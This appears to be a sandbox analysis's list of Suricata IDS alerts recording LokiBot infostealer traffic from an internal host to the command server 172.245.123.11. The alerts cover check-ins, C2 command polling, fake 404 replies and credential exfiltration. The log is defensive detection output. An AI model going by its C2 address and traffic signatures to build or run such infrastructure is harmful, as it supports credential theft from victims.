Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49723 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49766 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49723 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49741 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49722 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49734 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49760 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49760 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49760 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49766 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49766 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49760 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49760 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49723
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49717
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49740 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49716 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49766
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49772 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49772 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49772 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49740 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49742
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49711
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49772 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49772 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49732
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49739 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49725 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49760
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49715
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49739 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49734
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49718
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49741
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49736
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49712 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49712 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49772
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49712 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49801 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49804 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49815 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49810 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49720
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49725
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49801 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49801 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49801 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49801 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49795 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49739
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49795 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49712 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49854 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49854 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49854 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49828 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49828 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49828 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49810 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49795 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49860 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49828 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49804 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49804 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49854 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49810 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49719 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49748 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49860 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49748 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49716
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49748 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49804 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49778 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49804 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49712 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49795 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49810 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49748 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49748 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49828 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49821 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49821 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49860 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49854 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49740
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49860 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49860 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49821 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49810 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49821 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49821 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49877 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49883 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49883 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49795 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49801
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49727 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49778 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49883 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49877 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49877 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49712
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49883 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49883 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49748
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49877 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49815 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49727 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49778 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49828
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49839 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49860
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49877 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49778 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49778 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49815 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49854
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49839 -> 172.245.123.11:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49839 -> 172.245.123.11:80
